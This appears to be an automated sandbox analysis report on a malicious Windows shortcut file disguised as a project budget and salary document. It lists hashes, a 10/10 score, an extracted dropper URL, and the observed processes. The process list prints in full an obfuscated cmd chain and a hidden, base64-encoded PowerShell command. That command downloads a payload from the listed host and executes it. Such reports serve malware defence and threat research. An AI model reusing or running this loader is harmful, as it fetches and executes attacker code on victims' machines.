Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
0s -
max time network
122s -
platform
windows7_x64 -
resource
win7-20231215-en -
resource tags
-
submitted
10/01/2024, 16:07
General
-
Target
11012024_0007_2 _ Project budget and candidate salary..lnk
-
Size
53KB
-
MD5
10369f2b0ad5c9899bbb48e39baeedae
-
SHA1
970fc66713a597c9059f31177ed9618472982c24
-
SHA256
d1e5ce4e97e3ca866aac57eb293c764f56eda897b7685fd689cba9cdf5505fb3
-
SHA512
ce4efa3bd1cf7752b8420b023d598ba156785b7d19303951dee845d46e6a645d2f1a93b397c3454fae51b120f7fa141c0a42c04aef6b9966e405759d39b9d8be
-
SSDEEP
192:8Tb+sFcaygd21iq2HOXt12Py86uAd+7dYkMQ776SVzFSAsQgHuCMswPaod:o9B/RtH0t12JLL+kMKbSAsN4Jyu
Score
10/10
Malware Config
Extracted
Language
ps1
Deobfuscated
URLs
exe.dropper
https://thietbiytebt.online/file/
Signatures
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
Processes
-
C:\WINDOWS\system32\cmd.exe"C:\WINDOWS\system32\cmd.exe" /c set "PPgFUZmtkv=AbQAuAEMAb" && set "YjcmcVFgoZ=AXQA6ADoAR" && set "QRtJsBiiOR=AeABjAGUAc" && set "GkAJZBOhDq=QBiADIANQB" && set "ALkNjdNfBK=yAHQAXQA6A" && set "VNGsDWhTVb=AbQBCAGEAc" && set "RXKxbkfqhl=vAHMAdAAgA" && set "HjnGgZBlnA=AeAB0AC4AR" && set "XJtmpVuiIJ=dCommand J" && set "OaJiIMrBTH=uAC4ATQBlA" && set "QyevamEWXd=DoARgByAG8" && set "jEwUUPsykQ=ABwAGYAZgB" && set "UFkFSiDFQi=F0AOgA6AEE" && set "QaCNHpiKxM=QBVAHMAZQB" && set "gjCMGJaKgT=GkAIAAkAHU" && set "GhejGyBkOH=gAC0AVQByA" && set "DwyyeUicQg=pADsACgAkA" && set "BqmtOKzDYW=wA7AAoACQA" && set "PIrQzUyyYO=AYQB5AHUAe" && set "WUPrziAeJX=2AG8AawBlA" && set "sAGdtnxnlC=AUwBDAEkAS" && set "idzKMTvvYf=AAxADUAOwA" && set "daKRujHhsB=kAGkAbgBnA" && set "WHmVSLRenB=wBuAHYAZQB" && set "RrYYYXuatS=AawBPAFQAS" && set "lMfvMWVEtu=ACgAJAHQAc" && set "cYafXCtHyh=GkAbgBnACg" && set "YcQyoddWFR=KAAkAfQAKA" && set "YXERQgHPfq=AcwBpAG4AZ" && set "mOMeLddURm=AoAJAB2AGo" && set "rRmXhTLUDU=5AHMAdABlA" && set "YkXYwAeStL=CQAYwBvAHU" && set "ftSiDTgmIp=QBlAHMAdAA" && set "YMbxSTKPwE=GwATAAyAFo" && set "lTZXiJWMFG=pAG8AbgAgA" && set "tqYpTskImO=6AFoAagBjA" && set "mdpYwJAXCT=tAGcAdAAgA" && set "nUDLgdIEhW=EQATQB5AE0" && set "JKXpIRtQsA=CQAYwBvAG4" && set "HZOEMdmekx=DAAKQAKAHs" && set "JmnBQlCASz=gA9AFsAUwB" && set "IKqmTRWUCu=QBHAGwAbAB" && set "RtaxquJvUk=QBTAHQAYQB" && set "BhIYHCgKKU=EkASQAuAEc" && set "ivJSFOaIKK=hAG8AdgAgA" && set "bLCSchhQNA=nACgAWwBTA" && set "YRMgiaXaHG=GYAdgA9AFs" && set "xZHmYCeHTR=CsAIAAkAGw" && set "qcOSoFcmlk=wAoACIAYQB" && set "mRYekWydVk=HYAZQByAHQ" && set "IkAgROUgMf=gBNAFQARQB" && set "hUgkGNeSjm=G4AZwAoACI" && set "JhtUQXHUxx=wB0AGUAbQA" && set "WymiahIMbu=jAGgACgAJA" && set "MFXyJFtbtQ=Profile -" && set "ruSMFVtxyM=0AFMAdAByA" && set "HiaCRTxPiJ=NoLogo -No" && set "bMxcIKKhum=ABlAC0ASAB" && set "mjakxtbccK=AA7AAoACQA" && set "iStAOhbOGJ=G8AawBlAC0" && set "LzfzALLTBJ=GkAbABlACg" && set "itpdLNHYRx=AcgBpAG4AZ" && set "yEYmzLXCwF=DYANABTAHQ" && set "BDcrUGDRnp=QBuAGMAbwB" && set "mwPbCHoooy=2ACkAOwAKA" && set "HhgsarKMcg=e hidden -" && set "PqNIUQbuZP=QBjAGEAdAB" && set "pPPvcKezJk=gBnAF0AOgA" && set "JrmWBQfadg=olicy bypa" && set "YfCUanCCOp=WindowStyl" && set "zqpUfqyzZx=AcABiAEcAV" && set "DuOONevgvc=HkAcwB0AGU" && set "iXqutAKMSo=ACQB9AAoAC" && set "lhSAFxCRUG=TAHQAcgBpA" && set "tbncZvsbWS=ABsAGEAeQB" && set "RCuwqPhkbG=QAkAGMAbwB" && set "XYrNmIjMvo=AB0AGkAbwB" && set "nbaltDiMam=ARQB4AHAAc" && set "EbEhhPfVkE=AbwBkAGkAb" && set "bErueDVSOv=gBlAHMAcwB" && set "RCdFobrarV=FoAagBaAFc" && set "PdZJUCeddm=EgATQA2AEw" && set "ZLkjVrWsdh=HkAWQBqAGg" && set "vANaxbmYJF=gB5AHsACgA" && set "rfZNSJADGW=AcgBpACAAL" && set "nFkxBIgMZd=HsACgAJAAk" && set "MqwvArAXBC=IAFIAMABjA" && set "JiLQVELhll=ABlAG0ALgB" && set "sJhltJBror=zAGEAVwA1A" && set "HOEBggqkgB=QBuAHQAIAA" && set "zksGeQVaHI=start /min" && set "lkxlCwPgXT=AeQA5ADAAY" && set "FOcsIIRFbK=H0ACgA=" && set "VTkAxyGkTW=AYwBIAE0Ad" && set "jHohvcBcrn=1AG4AdAAgA" && set "vXruNOzqeh=AUwB5AHMAd" && set "YkptWaFgqq=AWQA1AFkAV" && set "wuWpJHCYnN=AZQB0AFMAd" && set "bXCqnLXHJA=AZQAKAAkAC" && set "MuVPQvXjvm=AWwBTAHkAc" && set "xruqxCcDzm=C4ARQBuAGM" && set "rNqeSyPUsC=GwAZQBlAHA" && set "SubLdvUNPh=JAEkAbgB2A" && set "QLNSTizvBg=ExecutionP" && set "wbLYTUtUbb=ABCAGgAWQB" && set "lbrQEmeALa=APQAgACgAJ" && set "nJwpImdfYM=kAEcASgBwA" && set "jFwcEtSpnR=QAgADEAMAA" && set "VzjanMGwoc=gByAG8AbQB" && set "yswfKrOuss=6AEEAUwBDA" && set "wmTekGRueW=AUgBlAHEAd" && set "VtgPaSioJT=CAGEAcwBlA" && set "fBWgosOUtc=AJABjAG8Ad" && set "QzEfjpqWqn=G0ALgBUAGU" && set "GWAmacSQQl=AB2AGoAagB" && set "DLSRKCphUZ=UAGUAeAB0A" && set "LWVtetnChA= "" powers" && set "UmaIqzYTmz=G8AbgB0AGU" && set "qBKWATCNri=AbgB0ACAAP" && set "jVpwvJUykz=yAHQALQBTA" && set "TvgOXAhqrX=GMAUABhAHI" && set "GwgtDqHbLn=JAGIAcgBlA" && set "RnuFEuuEad=QAgAEkAbgB" && set "OVDhyglOgK=AbgB0ACAAP" && set "xCUoOlFzxP=AByAGkAbgB" && set "ffrzcCxaSP=iACkAKQA7A" && set "fGGwPVRfCU=CAGEAcwBpA" && set "XdPTbpVAPR=XAFoAaABPA" && set "oXYeXWaqkz=VAHcATwBEA" && set "mrSTCdEtwR=wBlADYANAB" && set "IxZpYUuvrG=QBuAEIAbgA" && set "RYLYRbungc=HUAcgBpACA" && set "GUjxyUrRts=AVwByAGkAd" && set "dtMjQXnkcn=C0AVwBlAGI" && set "FjkzPZGyyt=7AAoAdwBoA" && set "SQsAuIaaOc=JAAkAJABjA" && set "pGNCxuepcj=hell.exe -" && set "qTZUcPReMu=AagBVAHUAY" && set "NLHBMSmNoj=QB2ACIAKQA" && set "CBeKvLhjFR=AIAAtAHMAI" && set "kfAnidgwSF=GEAawA7AAo" && set "KpuWiboPKf=CQAXwAuAEU" && set "vUwpwZEbez=HMAcwBhAGc" && set "miNDfDAYwk=AdABlAG4Ad" && set "AtYmadsJpQ=1AHgAcABmA" && set "eiHVmRytUW=C0APQAgADE" && set "UZOzANzDdG=uAEMAbwBuA" && set "AZjZYBTkSe=GUAWABSAGw" && set "xQOvjPVoMl=AagBhAG8Ad" && set "LzIajGywmW=QAuAEcAZQB" && set "OKRtPTAaYG=AOwAKAAkAC" && set "BuZHTeNMQd=AWQBuAFEAd" && set "QNteCcjIJv=ss -Encode" && set "SYgdTFUUGe=QAxAE4ARAB" && call %zksGeQVaHI%%LWVtetnChA%%pGNCxuepcj%%YfCUanCCOp%%HhgsarKMcg%%HiaCRTxPiJ%%MFXyJFtbtQ%%QLNSTizvBg%%JrmWBQfadg%%QNteCcjIJv%%XJtmpVuiIJ%%tbncZvsbWS%%AtYmadsJpQ%%YRMgiaXaHG%%vXruNOzqeh%%JiLQVELhll%%DLSRKCphUZ%%xruqxCcDzm%%EbEhhPfVkE%%pPPvcKezJk%%yswfKrOuss%%BhIYHCgKKU%%wuWpJHCYnN%%xCUoOlFzxP%%bLCSchhQNA%%DuOONevgvc%%PPgFUZmtkv%%WHmVSLRenB%%ALkNjdNfBK%%QyevamEWXd%%VNGsDWhTVb%%mrSTCdEtwR%%lhSAFxCRUG%%hUgkGNeSjm%%VTkAxyGkTW%%IkAgROUgMf%%tqYpTskImO%%ZLkjVrWsdh%%RrYYYXuatS%%SYgdTFUUGe%%oXYeXWaqkz%%RCdFobrarV%%YkptWaFgqq%%wbLYTUtUbb%%XdPTbpVAPR%%nUDLgdIEhW%%qTZUcPReMu%%IxZpYUuvrG%%ffrzcCxaSP%%mOMeLddURm%%xQOvjPVoMl%%JmnBQlCASz%%rRmXhTLUDU%%QzEfjpqWqn%%HjnGgZBlnA%%BDcrUGDRnp%%daKRujHhsB%%UFkFSiDFQi%%sAGdtnxnlC%%LzIajGywmW%%ruSMFVtxyM%%cYafXCtHyh%%MuVPQvXjvm%%JhtUQXHUxx%%UZOzANzDdG%%mRYekWydVk%%YjcmcVFgoZ%%VzjanMGwoc%%VtgPaSioJT%%yEYmzLXCwF%%itpdLNHYRx%%qcOSoFcmlk%%MqwvArAXBC%%PdZJUCeddm%%lkxlCwPgXT%%IKqmTRWUCu%%nJwpImdfYM%%AZjZYBTkSe%%BuZHTeNMQd%%GkAJZBOhDq%%sJhltJBror%%YMbxSTKPwE%%zqpUfqyzZx%%NLHBMSmNoj%%DwyyeUicQg%%RYLYRbungc%%lbrQEmeALa%%GWAmacSQQl%%ivJSFOaIKK%%xZHmYCeHTR%%PIrQzUyyYO%%jEwUUPsykQ%%mwPbCHoooy%%YkXYwAeStL%%qBKWATCNri%%jFwcEtSpnR%%FjkzPZGyyt%%LzfzALLTBJ%%fBWgosOUtc%%HOEBggqkgB%%mdpYwJAXCT%%HZOEMdmekx%%lMfvMWVEtu%%vANaxbmYJF%%SQsAuIaaOc%%UmaIqzYTmz%%OVDhyglOgK%%RnuFEuuEad%%WUPrziAeJX%%dtMjQXnkcn%%wmTekGRueW%%ftSiDTgmIp%%GhejGyBkOH%%gjCMGJaKgT%%rfZNSJADGW%%QaCNHpiKxM%%fGGwPVRfCU%%TvgOXAhqrX%%YXERQgHPfq%%BqmtOKzDYW%%SubLdvUNPh%%iStAOhbOGJ%%nbaltDiMam%%bErueDVSOv%%lTZXiJWMFG%%JKXpIRtQsA%%miNDfDAYwk%%mjakxtbccK%%GwgtDqHbLn%%kfAnidgwSF%%iXqutAKMSo%%PqNIUQbuZP%%WymiahIMbu%%nFkxBIgMZd%%GUjxyUrRts%%bMxcIKKhum%%RXKxbkfqhl%%KpuWiboPKf%%QRtJsBiiOR%%XYrNmIjMvo%%OaJiIMrBTH%%vUwpwZEbez%%bXCqnLXHJA%%RCuwqPhkbG%%jHohvcBcrn%%eiHVmRytUW%%OKRtPTAaYG%%RtaxquJvUk%%jVpwvJUykz%%rNqeSyPUsC%%CBeKvLhjFR%%idzKMTvvYf%%YcQyoddWFR%%FOcsIIRFbK%1⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -WindowStyle hidden -NoLogo -NoProfile -ExecutionPolicy bypass -EncodedCommand JABsAGEAeQB1AHgAcABmAGYAdgA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYwBIAE0AdgBNAFQARQB6AFoAagBjAHkAWQBqAGgAawBPAFQASQAxAE4ARABVAHcATwBEAFoAagBaAFcAWQA1AFkAVABCAGgAWQBXAFoAaABPAEQATQB5AE0AagBVAHUAYQBuAEIAbgAiACkAKQA7AAoAJAB2AGoAagBhAG8AdgA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5ADAAYQBHAGwAbABkAEcASgBwAGUAWABSAGwAWQBuAFEAdQBiADIANQBzAGEAVwA1AGwATAAyAFoAcABiAEcAVQB2ACIAKQApADsACgAkAHUAcgBpACAAPQAgACgAJAB2AGoAagBhAG8AdgAgACsAIAAkAGwAYQB5AHUAeABwAGYAZgB2ACkAOwAKACQAYwBvAHUAbgB0ACAAPQAgADEAMAA7AAoAdwBoAGkAbABlACgAJABjAG8AdQBuAHQAIAAtAGcAdAAgADAAKQAKAHsACgAJAHQAcgB5AHsACgAJAAkAJABjAG8AbgB0AGUAbgB0ACAAPQAgAEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQByAGkAIAAkAHUAcgBpACAALQBVAHMAZQBCAGEAcwBpAGMAUABhAHIAcwBpAG4AZwA7AAoACQAJAEkAbgB2AG8AawBlAC0ARQB4AHAAcgBlAHMAcwBpAG8AbgAgACQAYwBvAG4AdABlAG4AdAA7AAoACQAJAGIAcgBlAGEAawA7AAoACQB9AAoACQBjAGEAdABjAGgACgAJAHsACgAJAAkAVwByAGkAdABlAC0ASABvAHMAdAAgACQAXwAuAEUAeABjAGUAcAB0AGkAbwBuAC4ATQBlAHMAcwBhAGcAZQAKAAkACQAkAGMAbwB1AG4AdAAgAC0APQAgADEAOwAKAAkACQBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAHMAIAAxADUAOwAKAAkAfQAKAH0ACgA=2⤵
-
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\11012024_0007_2 _ Project budget and candidate salary..lnk"1⤵
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2.9MB
-
Filesize
9.6MB
-
Filesize
9.6MB
-
Filesize
512KB
-
Filesize
512KB
-
Filesize
512KB
-
Filesize
32KB
-
Filesize
9.6MB
-
Filesize
512KB
-
Filesize
512KB